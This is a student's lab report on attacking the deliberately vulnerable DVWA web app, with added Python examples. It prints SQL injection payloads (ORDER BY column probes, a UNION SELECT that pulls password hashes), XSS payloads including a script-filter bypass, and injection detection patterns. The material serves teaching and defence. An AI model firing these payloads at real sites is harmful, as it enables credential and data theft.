<Carmen Alcivar>
NORTHEASTERN UNIVERSITY 360 Huntington Ave, Boston, MA.
LAB ASSIGNMENT 6 – FOUNDATIONS
OF INFORMATION ASSURANCE (IA5010)
Contents
Lab #15: Attacking a Vulnerable Web Application and Database
a. Assessment Sheet
b. Challenge Question
c. Screenshots
Lab #15: Attacking a Vulnerable Web Application and Database
a. Assessment Sheet
Course Name and Number: Foundations of Information Assurance – IA5010
Student Name: <Carmen Alcivar>
Instructor Name: Derek Brodeur
Lab Due Date: <2/21/16>
Lab Assessment Questions & Answers
1. Why is it critical to perform a penetration test on a Web application and a
Web server prior to production implementation?
Performing a penetration test on a Web application and a Web server prior to
production implementation is a critical step in ensuring the confidentiality,
integrity, and availability (CIA) of the Web application or service. It is imperative
to perform the test before go-live in order to protect customers' private information
that will be entered via the Web application; finding and fixing flaws such as SQL
injection or cross-site scripting before release is far cheaper than after a breach.
There are also laws regulating the confidentiality of customers' data.
2. What is a cross-site scripting attack? Explain in your own words.
A cross-site scripting (XSS) attack exploits a Web page that takes user-supplied
input and places it into the HTML it returns without encoding it. The attacker
inserts scripting code (typically JavaScript) into that input so that it runs in
the browser of whoever views the page. XSS targets the client side, unlike SQL
injection, which targets the Web application's SQL database. The injected script
can steal data such as session cookies or modify a Web site's content as the
victim sees it.
3. What is a reflective cross-site scripting attack?
The reflective (reflected) cross-site scripting attack is a non-persistent attack:
the malicious input is carried in the request itself (for example a URL parameter)
and echoed back in the immediate response, so the script runs only for the user
who submits or opens that crafted request. Nothing is stored on the server and
no data on the server is modified.
4. Based on the tests you performed in this lab, which Web application attack is
more likely to extract privacy data elements out of a database?
SQL injection is the attack that extracts private data elements out of a database.
The UNION SELECT injections performed in Part 3 returned user names and password
hashes directly from the users table. Reflected cross-site scripting, by contrast,
runs in the victim's browser and does not query the backend database.
5. If you can monitor when SQL injections are performed on an SQL database,
what would you recommend as a security countermeasure to monitor your
production SQL databases?
I would recommend enabling the database server's query or audit logging and
monitoring it for the patterns used in SQL injection, such as UNION SELECT, ORDER
BY probes, comment terminators (#, --) and tautologies like '1'='1'. Database
administrators can then raise alerts through their existing channels, for example
Simple Network Management Protocol (SNMP) traps or scripted alarms into a SIEM, and
review unauthorized or abnormal queries. Encrypting the sensitive data elements that
reside in long-term storage of the SQL database is another option, so that data
pulled out through an injection is not directly usable.
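As an added example of the monitoring approach described above (not part of the original lab report), the script below scans a constructed, MySQL-style general query log for the injection patterns used in this lab and returns one alert per suspicious statement. The log lines, the database user names and the signature list are assumptions made for illustration.

```python
import re

# Constructed sample of a MySQL-style general query log: timestamp, DB user, statement.
# Not a real capture; the injected lines mirror the payloads used in Part 3 of this lab.
SAMPLE_LOG = """\
2016-02-21T10:00:01 dvwa SELECT first_name, last_name FROM users WHERE user_id = '1'
2016-02-21T10:00:05 dvwa SELECT first_name, last_name FROM users WHERE user_id = 'a' ORDER BY 3;#'
2016-02-21T10:00:09 dvwa SELECT first_name, last_name FROM users WHERE user_id = 'a' UNION SELECT user, password FROM users#'
2016-02-21T10:00:12 dvwa SELECT first_name, last_name FROM users WHERE user_id = '1' OR '1'='1'
2016-02-21T10:00:15 report SELECT COUNT(*) FROM orders WHERE status = 'shipped'
"""

# Signatures for the injection patterns exercised in the lab.  These are heuristics:
# a legitimate query can carry '#' inside a string literal, so tune them against a
# baseline of your own application's normal queries before alerting on them.
SIGNATURES = [
    ("union-select", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("order-by-probe", re.compile(r"\bORDER\s+BY\s+\d+\s*(;|--|#)", re.I)),
    ("comment-terminator", re.compile(r"(#|--\s|/\*)")),
    ("tautology", re.compile(r"\bOR\s+'([^']+)'\s*=\s*'\1'", re.I)),
]


def scan_query_log(text):
    """Return (timestamp, db_user, [matched signature names]) for each suspicious statement."""
    alerts = []
    for line in text.splitlines():
        parts = line.split(" ", 2)
        if len(parts) < 3:
            continue                      # malformed line: skip rather than crash the monitor
        ts, db_user, query = parts
        hits = [name for name, rx in SIGNATURES if rx.search(query)]
        if hits:
            alerts.append((ts, db_user, hits))
    return alerts


if __name__ == "__main__":
    for ts, db_user, hits in scan_query_log(SAMPLE_LOG):
        # In production this is where an SNMP trap, syslog event or SIEM alert would be raised.
        print(f"{ts} user={db_user} signatures={','.join(hits)}")
```

The same patterns can be applied at the Web tier (reverse proxy or WAF logs), which catches the payload before it reaches the database; the database log is the last line of detection and is useful precisely because it shows what the application actually executed.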
6. Given that Apache and Internet Information Services (IIS) are the two most
popular Web application servers for Linux and Microsoft® Windows
platforms, what would you do to identify known software vulnerabilities and
exploits?
I could search the CVE list (for example at cve.mitre.org or the NVD) using the
keywords Apache and IIS to find all publicly known vulnerabilities and exploits for
the versions in use, and check the vendors' own security advisories. This makes it
possible to apply all software patches and security patches on the production Web
servers and remediate critical and major software vulnerabilities before the
application is released.
7. What can you do to ensure that your organization incorporates penetration
testing and Web application testing as part of its implementation
procedures?
Penetration testing should be part of the policy. The organization's security policy
should dictate that no production Web application can be implemented without
proper penetration testing and security hardening.
8. What is the purpose of setting the DVWA security level to "low" before
beginning the remaining lab steps?
The low setting turns off DVWA's input filtering, so the application behaves like
an unprotected, vulnerable Web application. The attacks in the remaining steps only
succeed against that configuration; at higher settings the same payloads are
filtered, as the High-setting test in Part 2 shows.
9. As an ethical hacker, once you’ve determined that a database is injectable,
what should you do with that information?
As an ethical hacker, I should report the finding to the system owner and
recommend specific countermeasures for remediating the vulnerabilities and
eliminating the exploits, rather than using the access to extract data. Once I have
determined that a database is injectable
b. Challenge Question
c. Screenshots:
Part 2:
[Deliverable Lab Step 5] screenshot showing the exposed vulnerability
1. [Deliverable Lab Step 8] screenshot showing the cross-site scripting attack at the High
security setting. The injected script is not executed (the attack does not go through).
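As an added example (not code from the lab or from DVWA itself), the model below reflects a "name" parameter three ways: verbatim, through a script-tag-stripping filter that approximates a "high" setting (this filter is an assumption, not DVWA's actual code), and through proper HTML encoding. It shows why the lab's script payload is blocked at the High setting while a filter of that kind still lets an event-handler payload through, and why output encoding neutralises both.

```python
import html
import re


def reflect_low(name):
    """Low: input echoed verbatim into the HTML."""
    return f"<pre>Hello {name}</pre>"


def reflect_high(name):
    """High (assumed model): strips anything that looks like a <script ...> tag, nothing else."""
    cleaned = re.sub(r"<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t", "", name, flags=re.I)
    return f"<pre>Hello {cleaned}</pre>"


def reflect_escaped(name):
    """Correct fix: HTML-encode the value so the browser renders it as text, not markup."""
    return f"<pre>Hello {html.escape(name, quote=True)}</pre>"


# A script tag, or an on* event handler attribute inside a tag: markup a browser would execute.
ACTIVE_MARKUP = re.compile(r"<script\b|<\w+[^>]*\son\w+\s*=", re.I)


def reflects_active_content(page):
    """True if the response still carries executable markup from the reflected input."""
    return ACTIVE_MARKUP.search(page) is not None


SCRIPT_PAYLOAD = "<script>alert(1)</script>"      # the classic lab payload
EVENT_PAYLOAD = "<img src=x onerror=alert(1)>"    # contains no 'script' substring to strip


def results():
    """Map (level, payload) -> whether the payload would execute in the victim's browser."""
    out = {}
    levels = (("low", reflect_low), ("high", reflect_high), ("escaped", reflect_escaped))
    payloads = (("script", SCRIPT_PAYLOAD), ("event", EVENT_PAYLOAD))
    for level, fn in levels:
        for label, payload in payloads:
            out[(level, label)] = reflects_active_content(fn(payload))
    return out


if __name__ == "__main__":
    for (level, label), executes in sorted(results().items()):
        print(f"{level:8s} {label:7s} executes={executes}")
```

The lesson is the one the High-setting screenshot hints at: a blacklist that strips known bad strings only defeats the payloads it was written for, whereas encoding output for the HTML context defeats the whole class.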
Part 3:
Step 6: screenshot displaying the result of using the presence-or-absence-of-errors
strategy to determine the structure of the query. Review the output of this input
(a' ORDER BY 1;# ). Here, I am trying to order the output by the first (1) column, or
field; the ;# terminates the original query and comments out whatever follows. In this
case there is no error, which means there is a first column. This is how the structure
of the database query is learned.
Step 7: screenshot displaying the result of the same strategy with the input
(a' ORDER BY 2;#). Here, I am trying to order the output by the second (2) column, or
field. In this case there is no error, which means there is a second column.
Step 8: screenshot displaying the result of the same strategy with the input
(a' ORDER BY 3;#). Here, I am trying to order the output by the third (3) column, or
field. In this case there is an error, which means there is no third column: the query
returns exactly two columns, which is the number a UNION SELECT payload must match.
[Deliverable Lab Step 18]: screenshot showing the user information for the database
user name that is currently being used by the application to run queries on the server.
[Deliverable Lab Step 20]: screenshot showing the password hash retrieved for the user
from the backend database. The value returned is the one-way hash of the user's stored
password rather than the password itself; hashing in general maps data to a fixed-size
value (http://www.webopedia.com/TERM/H/hashing.html), and here it is used so that the
plaintext password is not kept in the table. An unsalted hash of a weak password can
still be recovered offline with a wordlist, so exposing it is a serious finding.
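The whole Part 3 procedure, as an added worked example that is not part of the original lab report: an in-memory SQLite stand-in for the DVWA backend (constructed sample rows, assumed column names), the ORDER BY column-count probe from Steps 6-8, UNION SELECT payloads in the spirit of Steps 18 and 20, and the parameterised query that defeats them. Because SQLite has no MySQL-style # comment and no user() function, the payloads end the query with "-- " and fingerprint the backend with sqlite_version() instead; those substitutions are assumptions of this example, not the lab's exact inputs.

```python
import hashlib
import sqlite3

# Constructed sample rows modelled on a DVWA-style users table (assumption: not the lab's data).
# Passwords are stored as unsalted MD5 digests, which is what makes Step 20's output crackable.
SAMPLE_USERS = [
    (1, "admin", "admin", "admin", hashlib.md5(b"password").hexdigest()),
    (2, "gordonb", "Gordon", "Brown", hashlib.md5(b"abc123").hexdigest()),
]


def make_db():
    """In-memory SQLite stand-in for the MySQL backend used in the lab."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, username TEXT, "
        "first_name TEXT, last_name TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_lookup(conn, user_id):
    """'Low' security style: the id parameter is concatenated straight into the SQL text."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def count_columns(conn, max_cols=10):
    """Steps 6-8: raise the ORDER BY index until the database errors.
    The last index that did NOT error is the number of columns in the injected
    SELECT.  SQLite lacks MySQL's '#' comment, so '-- ' ends the original query."""
    columns = 0
    for n in range(1, max_cols + 1):
        try:
            vulnerable_lookup(conn, f"a' ORDER BY {n}-- ")
        except sqlite3.OperationalError:   # "ORDER BY term out of range"
            break
        columns = n
    return columns


def fingerprint_db(conn):
    """Step 18 analogue: make the database describe itself through the UNION.
    MySQL would use user() or database(); SQLite exposes sqlite_version()."""
    rows = vulnerable_lookup(conn, "a' UNION SELECT sqlite_version(), NULL-- ")
    return rows[0][0]


def extract_credentials(conn):
    """Step 20 analogue: pull user names and password hashes through the same injection.
    Both selected columns are needed because the probe above found exactly two."""
    return vulnerable_lookup(conn, "a' UNION SELECT username, password FROM users-- ")


def safe_lookup(conn, user_id):
    """Countermeasure: a parameterised query keeps the input as data, never as SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("columns in the injected SELECT:", count_columns(db))
    print("backend:", fingerprint_db(db))
    for username, pw_hash in extract_credentials(db):
        print(f"{username}: {pw_hash}")
    payload = "a' UNION SELECT username, password FROM users-- "
    print("same payload against the parameterised query:", safe_lookup(db, payload))
```

Running it prints two columns, the SQLite version string, both users with their MD5 digests, and an empty result for the parameterised query, which is the behaviour the lab's screenshots document for the low setting and the fix the assessment answers call for.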
Part 4:
[Deliverable Lab Step 8] screen capture showing the contents of the testing1.txt file